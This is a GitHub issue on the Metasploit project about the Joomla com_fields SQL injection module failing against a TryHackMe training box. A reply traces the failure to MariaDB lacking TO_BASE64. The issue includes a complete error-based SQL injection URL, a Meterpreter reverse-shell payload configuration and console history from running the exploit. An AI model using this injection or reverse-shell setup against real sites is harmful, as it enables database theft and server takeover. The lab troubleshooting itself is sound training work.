Open cgranleese-r7 opened 4 years ago
Hey future @cgranleese-r7 , we need an issue template filled out properly!
When creating an issue, please ensure that the default issue template has been updated with the required details.
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
The problem could be that the Database on TryHackMe TO_BASE64
not knows. See
http://10.10.147.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(2170,CONCAT(0x2e,0x6942465a70,(SELECT%20MID((IFNULL(CAST(TO_BASE64(table_name)%20AS%20CHAR),0x20)),1,22)%20FROM%20information_schema.tables%20order%20by%20update_time%20DESC%20LIMIT%201),0x5359595a48),4879))
TO_BASE64
was introduced with MySQL 5.6 on the box you have 5.5.64-MariaDB
Results in:
500 FUNCTION joomla.TO_BASE64 does not exist
Steps to reproduce
How'd you do it?
Yea, it failed and returned - Error retrieving table prefix
Were you following a specific guide/tutorial or reading documentation?
https://tryhackme.com/room/dailybugle
Expected behavior
What should happen? Return a reverse shell
Current behavior
What happens instead? It returns Error retrieving table prefix
Metasploit version
Framework: 5.0.101-dev
Additional Information
If your version is less than
5.0.96
, please update to the latest version and ensure your issue is still present.If the issue is encountered within
msfconsole
, please run thedebug
command using the instructions below. If the issue is encountered outisdemsfconsole
, or the issue causesmsfconsole
to crash on startup, please delete this section.Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
``` [framework/ui/console] ActiveModule=exploit/unix/webapp/joomla_comfields_sqli_rce [unix/webapp/joomla_comfields_sqli_rce] WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=10.10.180.131 RPORT=80 VHOST= SSL=false Proxies= UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) HttpUsername= HttpPassword= HttpRawHeaders= DigestAuthIIS=true SSLVersion=Auto FingerprintCheck=true DOMAIN=WORKSTATION HttpClientTimeout= HttpPartialResponses=false HttpTrace=true HttpTraceHeadersOnly=false HttpTraceColors=red/blu HTTP::uri_encode_mode=hex-normal HTTP::uri_full_url=false HTTP::pad_method_uri_count=1 HTTP::pad_uri_version_count=1 HTTP::pad_method_uri_type=space HTTP::pad_uri_version_type=space HTTP::method_random_valid=false HTTP::method_random_invalid=false HTTP::method_random_case=false HTTP::version_random_valid=false HTTP::version_random_invalid=false HTTP::uri_dir_self_reference=false HTTP::uri_dir_fake_relative=false HTTP::uri_use_backslashes=false HTTP::pad_fake_headers=false HTTP::pad_fake_headers_count=0 HTTP::pad_get_params=false HTTP::pad_get_params_count=16 HTTP::pad_post_params=false HTTP::pad_post_params_count=16 HTTP::uri_fake_end=false HTTP::uri_fake_params_start=false HTTP::header_folding=false FileDropperDelay= TARGETURI=/ PAYLOAD=php/meterpreter/reverse_tcp LHOST=10.11.16.15 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true AutoLoadStdapi=true AutoVerifySession=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false ```History
The following commands were ran during the session and before this issue occurred:
Collapse
``` 221 search joomla 222 use 9 223 options 224 set RHOSTS 10.10.180.131 225 options 226 run 227 set httptrace true 228 run 229 search joomla 230 search joomla type:exploit 231 use 2 232 options 233 set RHOSTS 10.10.180.131 234 ip a 235 set LHOST 10.11.16.15 236 options 237 run 238 search joomla 239 search joomla type:exploit 240 use 5 241 options 242 set RHOSTS 10.10.180.131 243 set USERNAME jonah 244 set LHOST 10.11.16.15 245 options 246 set TARGETuRI / 247 set PASSWORD ***** 248 run 249 set HTTPTRACE true 250 options 251 run 252 info -d 253 search joomla type:exploit 254 use 2 255 options 256 run 257 set HTTPTRACE true 258 run 259 edit 260 run 261 --version 262 version 263 debug ```Errors
The following errors occurred before the issue occurred:
Collapse
``` [09/17/2020 05:47:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, inLogs
The following logs were recorded before the issue occurred:
Collapse
``` Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, inVersion/Install
The versions and install method of your Metasploit setup:
Collapse
``` Framework: 5.0.101-dev Ruby: ruby 2.7.0p0 (2019-12-25 revision 647ee6f091) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```